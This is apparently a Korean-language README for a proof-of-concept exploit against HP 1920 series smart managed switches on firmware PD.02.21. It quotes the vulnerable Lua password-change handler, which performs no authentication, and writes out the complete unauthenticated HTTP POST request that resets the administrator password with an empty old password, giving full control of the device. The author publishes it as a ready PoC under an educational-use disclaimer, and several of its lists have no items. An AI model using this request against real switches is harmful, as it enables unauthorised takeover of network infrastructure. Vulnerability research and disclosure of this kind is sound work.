
HP 1920 시리즈 스위치의 인증 우회에 대한 개념 증명 익스플로잇으로, 조작된 HTTP POST 요청을 통해 인증 없이 관리자 비밀번호를 변경할 수 있습니다.
펌웨어 버전: PD.02.21
영향을 받는 장치: HP 1920 시리즈 스마트 관리형 스위치
이 저장소는 펌웨어 버전 PD.02.21을 실행하는 HP 1920 시리즈 스마트 관리형 스위치의 중요한 인증 우회 취약점을 문서화합니다. 이 취약점을 통해 인증되지 않은 공격자가 사전 인증 없이 관리자 비밀번호를 변경할 수 있어 장치를 완전히 장악할 수 있습니다.
취약점은 장치의 기본 비밀번호 변경을 처리하는 /login/default_password_cfg.lua 스크립트에 존재합니다. 이 스크립트는:
oldPwd 매개변수가 기본 비밀번호(비어 있음)와 일치하는지만 확인합니다.default_password_cfg.lua의 주요 취약 부분:
if (request_method == 'POST') then
-- No authentication or session checks!
local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
-- ...
if form_post.oldPwd ~= defaultPassword then
errorStatus = "401 Unauthorized"
errorText = label.old_password_mismatch
else
-- Proceeds to change password
-- ...
end
end
스크립트에 중요한 보안 제어 기능이 누락되었습니다:
공격자는 간단한 HTTP POST 요청을 사용하여 이 취약점을 악용할 수 있습니다:
POST /login/default_password_cfg.lua HTTP/1.1
Host: [target-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]
username=admin&oldPwd=&newPwd=[new-password]&confirmPwd=[new-password]
참고: 기본 비밀번호가 비어 있으므로 oldPwd 매개변수는 비워 둡니다.
이 취약점을 통해 인증되지 않은 공격자는 다음을 수행할 수 있습니다:
원래 이 취약점을 발견한 사람을 조사할 시간이 없었습니다. 단지 개념 증명을 게시하는 것입니다.
이 정보는 교육 목적으로만 제공됩니다. 작성자는 이 정보의 오용에 대해 책임을 지지 않습니다. 취약점을 테스트하기 전에 항상 적절한 승인을 받으십시오.